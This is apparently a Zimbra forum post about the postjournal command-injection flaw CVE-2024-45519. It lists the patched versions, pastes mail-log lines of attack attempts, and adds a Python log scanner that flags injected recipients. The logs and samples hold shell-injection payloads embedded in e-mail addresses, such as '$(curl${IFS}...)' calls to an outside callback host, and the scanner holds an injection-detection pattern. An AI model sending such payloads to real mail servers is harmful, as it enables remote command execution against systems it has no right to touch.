
Installation and Upgrade • Severe exploit in postjournal CVE-2024-45519

I mentioned it here too: viewtopic.php?p=314125#p314125 but it deserves its own topic.

There is a vulnerability in Zimbra's postjournal system that allows arbitrary command execution by sending an e-mail to it. Basically you can just put shell code in a recipient. It's being tracked under CVE-2024-45519.

My system does not seem to be running postjournal:

Code:

sudo -i -u zimbra zmlocalconfig | grep -Fi postjournal_enabled
postjournal_enabled = false
zmcontrol -v
Release 10.1.1.GA.4200000.UBUNTU20.64 UBUNTU20_64 FOSS edition.
I also can't find any references to postjournal on my system, with 'local', 'aptitude search', etc.

These versions are fixed:

9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46

Exploit attempts have been reported starting September 28th. My own server sees attempts starting Oct 1:

Code:

# cat /var/log/mail.log | grep -F '$('
Oct  1 14:03:26 meel postfix/smtpd[2440729]: NOQUEUE: filter: RCPT from unknown[45.41.187.134]: <aaaa@mail.domain.com>: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10026; from=<aaaa@mail.domain.com> to=<"aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)"@mail.domain.com> proto=ESMTP helo=<localhost>
Oct  1 14:03:26 meel postfix/smtpd[2440729]: NOQUEUE: filter: RCPT from unknown[45.41.187.134]: <aaaa@mail.domain.com>: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10024; from=<aaaa@mail.domain.com> to=<"aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)"@mail.domain.com> proto=ESMTP helo=<localhost>
Oct  1 14:03:26 meel postfix/smtpd[2440729]: NOQUEUE: reject: RCPT from unknown[45.41.187.134]: 554 5.7.1 <aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)@mail.domain.com>: Relay access denied; from=<aaaa@mail.domain.com> to=<"aabbb$(curl${IFS}crttmntmqnn2vlg148ug1xjxssxox7gcr.oast.live)"@mail.domain.com> proto=ESMTP helo=<localhost>
The link below says that the source needs to be in 'mynetworks', so the above 'Relay access denied' may mean that it wouldn't have been vulnerable, but I'm not sure.

I don't know if I can see if the curl command was executed on my server. I did just execute it on my PC at home, so now they think they have a catch...

https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
https://blog.projectdiscovery.io/zimbra ... execution/

Statistics: Posted by halfgaar — Wed Oct 02, 2024 9:42 pm
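The post above grepped mail.log for '$(' by hand and then wondered whether "Relay access denied" meant the payload never went anywhere. The script below is an added example (not halfgaar's code and not part of Zimbra) that automates both checks: it parses Postfix smtpd RCPT lines of the format shown in the post, flags recipients carrying shell-injection metacharacters, groups the hits per client IP, and records whether Postfix rejected the recipient at RCPT time (a NOQUEUE reject means the message was never queued, so it never reached a delivery agent such as postjournal; a filter-only entry with no reject was accepted and deserves a closer look in the delivery logs). It also parses zmlocalconfig output for postjournal_enabled. The log lines, IPs, hostnames and the callback domain are constructed placeholders, and the metacharacter pattern is a heuristic of my own, so expect the occasional false positive on unusual but legitimate addresses.

```python
import re

# Constructed sample modelled on the mail.log format in the post. IPs are
# documentation addresses and the callback host is a placeholder, not real data.
SAMPLE_LOG = """\
Oct  1 14:03:26 mx postfix/smtpd[2440729]: NOQUEUE: filter: RCPT from unknown[203.0.113.5]: <aaaa@mail.example.com>: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10026; from=<aaaa@mail.example.com> to=<"aabbb$(curl${IFS}callback.oast.invalid)"@mail.example.com> proto=ESMTP helo=<localhost>
Oct  1 14:03:26 mx postfix/smtpd[2440729]: NOQUEUE: reject: RCPT from unknown[203.0.113.5]: 554 5.7.1 <aabbb$(curl${IFS}callback.oast.invalid)@mail.example.com>: Relay access denied; from=<aaaa@mail.example.com> to=<"aabbb$(curl${IFS}callback.oast.invalid)"@mail.example.com> proto=ESMTP helo=<localhost>
Oct  1 14:05:10 mx postfix/smtpd[2440731]: NOQUEUE: filter: RCPT from unknown[198.51.100.7]: <bob@mail.example.com>: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10024; from=<bob@mail.example.com> to=<"x`id`"@mail.example.com> proto=ESMTP helo=<localhost>
Oct  1 14:06:00 mx postfix/smtpd[2440740]: NOQUEUE: filter: RCPT from mail.example.net[192.0.2.10]: <alice@example.net>: Sender address triggers FILTER smtp-amavis:[127.0.0.1]:10024; from=<alice@example.net> to=<bob@mail.example.com> proto=ESMTP helo=<mail.example.net>
"""

# Postfix smtpd "NOQUEUE: filter|reject: RCPT from host[ip]: ... to=<addr>" lines.
RCPT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) postfix/smtpd\[\d+\]: "
    r"NOQUEUE: (?P<action>filter|reject): RCPT from (?P<client>\S+?)\[(?P<ip>[^\]]+)\]:"
    r".*? to=<(?P<to>[^>]*)>"
)

# Heuristic: shell command substitution, backticks, ${IFS}-style whitespace
# evasion, or command separators inside the recipient local part. This is an
# assumption of mine about what an injection attempt looks like, not a Zimbra
# or Postfix definition.
INJECTION_RE = re.compile(r"\$\(|`|\$\{IFS\}|[;|&]")


def scan_log(text):
    """Return one event per RCPT log line whose recipient looks like an injection."""
    events = []
    for line in text.splitlines():
        m = RCPT_RE.match(line)
        if not m:
            continue
        to = m.group("to")
        if not INJECTION_RE.search(to):
            continue
        events.append({
            "ts": m.group("ts"),
            "ip": m.group("ip"),
            "client": m.group("client"),
            "to": to,
            "action": m.group("action"),
            # True when Postfix refused the recipient before queuing (NOQUEUE reject).
            "rejected": m.group("action") == "reject",
            "reason": "Relay access denied" if "Relay access denied" in line else "",
        })
    return events


def summarize(events):
    """Group events per client IP: distinct recipients tried and whether any were rejected.

    An IP whose injection attempts were all logged as 'filter' with no 'reject'
    had its recipient accepted, so follow it into the delivery logs."""
    summary = {}
    for ev in events:
        entry = summary.setdefault(ev["ip"], {"recipients": set(), "rejected": False})
        entry["recipients"].add(ev["to"])
        entry["rejected"] = entry["rejected"] or ev["rejected"]
    return summary


def postjournal_enabled(zmlocalconfig_output):
    """Parse 'key = value' lines from zmlocalconfig; True/False, or None if the key is absent."""
    for line in zmlocalconfig_output.splitlines():
        key, sep, value = line.partition("=")
        if sep and key.strip() == "postjournal_enabled":
            return value.strip().lower() == "true"
    return None


if __name__ == "__main__":
    for ip, info in summarize(scan_log(SAMPLE_LOG)).items():
        state = "rejected at RCPT" if info["rejected"] else "ACCEPTED, check delivery logs"
        print(f"{ip}: {len(info['recipients'])} injected recipient(s), {state}")
        for rcpt in sorted(info["recipients"]):
            print(f"    to=<{rcpt}>")
    print("postjournal_enabled:", postjournal_enabled("postjournal_enabled = false\n"))
```

Run it against a real file with the grep replaced by the parser (read /var/log/mail.log into the text argument); the pattern list in INJECTION_RE is the place to tune if you see other encodings of the payload.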


